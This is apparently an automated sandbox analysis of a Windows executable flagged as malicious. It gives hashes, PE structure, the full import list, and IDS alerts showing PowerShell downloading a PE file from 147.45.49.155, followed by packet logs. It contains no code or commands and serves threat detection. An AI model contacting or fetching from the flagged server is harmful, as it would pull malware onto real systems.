SHA-512: | 4195E5CCA900C5199D9A726795EA0F4AB2BF19FAB8356AD83265EC66157657A23EE3680718DF56E624BFF60036696735714A64FE95872B9B47A55634F0F2C76B |
Malicious: | true |
Preview: |
File type: | |
Entropy (8bit): | 6.30643452024023 |
TrID: |
|
File name: | TCKxnQ5CPn.exe |
File size: | 1'083'904 bytes |
MD5: | 2a89603d2620b2a62113513709e38e95 |
SHA1: | e82753848fbd2e4c993661a80ad11cca2fa73b77 |
SHA256: | b52b0e15bcdc6b45a70fbf908381b1385b1a84bf6eb2bcfc35cb684b774021f7 |
SHA512: | 2ad57bcde8d647cf8c7da2fe563ed07f9f51e4d4a61397c459705c95d14ac0f48e95ae49126947bd4a7a8b7fc360a3a336a9bba41111cedda422faf508773e98 |
SSDEEP: | 24576:xrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaI1M:x2EYTb8atv1orq+pEiSDTj1VyvBa6 |
TLSH: | F2357C4973A4419DFEABE1B6CA23C607D6B17C490276861F01A47B767F337712A2E321 |
File Content Preview: | MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG.....>PG......PG......PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(..#PG."(..*PG."(...PG.+PF..RG..9I.{PG..9D.*PG..9..*PG |
Icon Hash: | 0fd88dc89ea7861b |
Entrypoint: | 0x14002549c |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x140000000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE |
DLL Characteristics: | HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x676A8A01 [Tue Dec 24 10:16:33 2024 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 2 |
File Version Major: | 5 |
File Version Minor: | 2 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 2 |
Import Hash: | fadc5a257419d2541a6b13dfb5e311e2 |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe5c10 | 0x17c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfb000 | 0x14114 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xf4000 | 0x6f48 | .pdata |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x110000 | 0xa74 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc7050 | 0x1c | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0xd9aa0 | 0x28 | .rdata |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xc7070 | 0x100 | .rdata |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb5000 | 0x1138 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0xb3328 | 0xb3400 | 507a8505198e35cc9675301d53e3b1c4 | False | 0.5503358721234309 | data | 6.5212967575920215 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0xb5000 | 0x34204 | 0x34400 | 9eda36be0cf076085a2f9772c1ee5803 | False | 0.30884139503588515 | data | 5.360588077813426 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xea000 | 0x9120 | 0x5000 | ec6b77d6ef8898b0d3b7d48c042d66a0 | False | 0.040673828125 | DOS executable (block device driver) | 0.5749243362866429 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.pdata | 0xf4000 | 0x6f48 | 0x7000 | 4416e27f8be9f9271c439d2fd34d1b2d | False | 0.49612862723214285 | data | 5.911479421450324 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.rsrc | 0xfb000 | 0x14114 | 0x14200 | fd46d89329841565eb0ec20cdc242aa0 | False | 0.1937597049689441 | data | 4.245533728497325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x110000 | 0xa74 | 0xc00 | 5ddb0e422ace102fe530e589a0cbec6f | False | 0.4850260416666667 | data | 5.139847116863034 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0xfb458 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
RT_ICON | 0xfb580 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
RT_ICON | 0xfb6a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
RT_ICON | 0xfb7d0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/m | English | Great Britain | 0.14468236129184905 |
RT_MENU | 0x10bff8 | 0x50 | data | English | Great Britain | 0.9 |
RT_STRING | 0x10c048 | 0x594 | data | English | Great Britain | 0.3333333333333333 |
RT_STRING | 0x10c5dc | 0x68a | data | English | Great Britain | 0.2735961768219833 |
RT_STRING | 0x10cc68 | 0x490 | data | English | Great Britain | 0.3715753424657534 |
RT_STRING | 0x10d0f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
RT_STRING | 0x10d6f4 | 0x65c | data | English | Great Britain | 0.34336609336609336 |
RT_STRING | 0x10dd50 | 0x466 | data | English | Great Britain | 0.3605683836589698 |
RT_STRING | 0x10e1b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186 |
RT_RCDATA | 0x10e310 | 0x8e6 | data | | | 1.004828797190518 |
RT_GROUP_ICON | 0x10ebf8 | 0x14 | data | English | Great Britain | 1.25 |
RT_GROUP_ICON | 0x10ec0c | 0x14 | data | English | Great Britain | 1.25 |
RT_GROUP_ICON | 0x10ec20 | 0x14 | data | English | Great Britain | 1.15 |
RT_GROUP_ICON | 0x10ec34 | 0x14 | data | English | Great Britain | 1.25 |
RT_VERSION | 0x10ec48 | 0xdc | data | English | Great Britain | 0.6181818181818182 |
RT_MANIFEST | 0x10ed24 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823 |
DLL | Import |
---|---|
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect |
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW |
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create |
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W |
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable |
PSAPI.DLL | GetProcessMemoryInfo |
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile |
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile |
UxTheme.dll | IsThemeActive |
KERNEL32.dll | WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, GetFullPathNameW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, EnterCriticalSection, DuplicateHandle, GetStdHandle, CreatePipe, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, CreateThread, GetCurrentProcess, GetCurrentThread, LeaveCriticalSection, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, TlsAlloc, ResetEvent, WaitForSingleObjectEx, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, CloseHandle, WriteConsoleW, MoveFileW, RtlCaptureContext |
USER32.dll | GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetWindowLongW, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongPtrW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, SetWindowLongPtrW, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, IsCharUpperW, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, GetClipboardData, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, IsCharLowerW, IsCharAlphaNumericW, IsCharAlphaW, GetKeyboardLayoutNameW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, SetMenuDefaultItem, CloseClipboard, GetWindowRect, SetUserObjectSecurity, IsClipboardFormatAvailable, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, OpenClipboard, GetWindowLongPtrW |
GDI32.dll | EndPath, DeleteObject, GetDeviceCaps, ExtCreatePen, StrokePath, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, GetTextExtentPoint32W, CreateCompatibleBitmap, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StretchBlt, SelectObject, CreateCompatibleDC, StrokeAndFillPath |
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW |
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegSetValueExW, GetSecurityDescriptorDacl, GetAclInformation, RegCreateKeyExW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW, GetUserNameW |
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW |
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket |
OLEAUT32.dll | VariantChangeType, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, VariantTimeToSystemTime, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, VariantInit, VariantClear, VariantCopy, SysAllocString, SafeArrayCreateVector, VarR8FromDec, SafeArrayAllocDescriptorEx, SafeArrayAllocData, SysStringLen, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, SysReAllocString, SafeArrayAccessData |
Language of compilation system | Country where language is spoken |
---|---|
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-27T15:00:50.134198+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 1 | 192.168.2.9 | 49707 | 147.45.49.155 | 443 | TCP |
2024-12-27T15:00:50.391754+0100 | 1810003 | Joe Security ANOMALY Windows PowerShell HTTP PE File Download | 2 | 147.45.49.155 | 443 | 192.168.2.9 | 49707 | TCP |
Dec 27, 2024 15:00:51.576220989 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.576240063 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.582003117 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.582024097 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.582058907 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.582067013 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.582093954 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.582113981 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.663161039 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.663182974 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.663235903 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.663247108 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.663285017 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.749490976 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.749515057 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.749592066 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.749627113 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.749667883 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.755047083 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.755064011 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.755116940 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.755124092 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.755157948 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.759879112 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.759901047 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.759943008 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.759949923 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.759989977 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.765412092 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.765434980 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.765471935 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.765479088 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.765506983 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.765521049 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.770863056 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.770884037 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.770915985 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.770929098 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.770950079 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.770967960 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.776110888 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.776135921 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.776191950 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.776199102 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.776226044 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.776245117 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.782109022 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.782133102 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.782170057 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.782176018 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.782205105 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.782216072 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.865289927 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.865312099 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.865381956 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.865391016 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.865422964 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.951157093 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.951181889 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.951266050 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.951283932 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.951322079 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.956379890 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.956399918 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.956468105 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.956475019 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.956485987 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.956517935 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.958844900 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.958898067 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.958903074 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.958914042 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:51.958966017 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:51.973601103 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:52.888207912 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:52.888248920 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:52.888334036 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:52.892107010 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:52.892128944 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:54.414563894 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:54.414679050 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:54.416055918 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:54.416078091 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:54.416321993 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:54.422947884 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:54.467339993 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.036009073 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.088423014 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.227916956 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.227930069 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.227974892 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.227993965 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.228008032 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.228032112 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.228065014 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.228084087 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.228122950 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.274883986 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.274910927 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.275028944 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.275062084 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.275095940 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.275116920 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.423544884 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.423577070 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.423744917 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.423806906 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.423872948 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.458956003 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.458977938 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.459028006 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
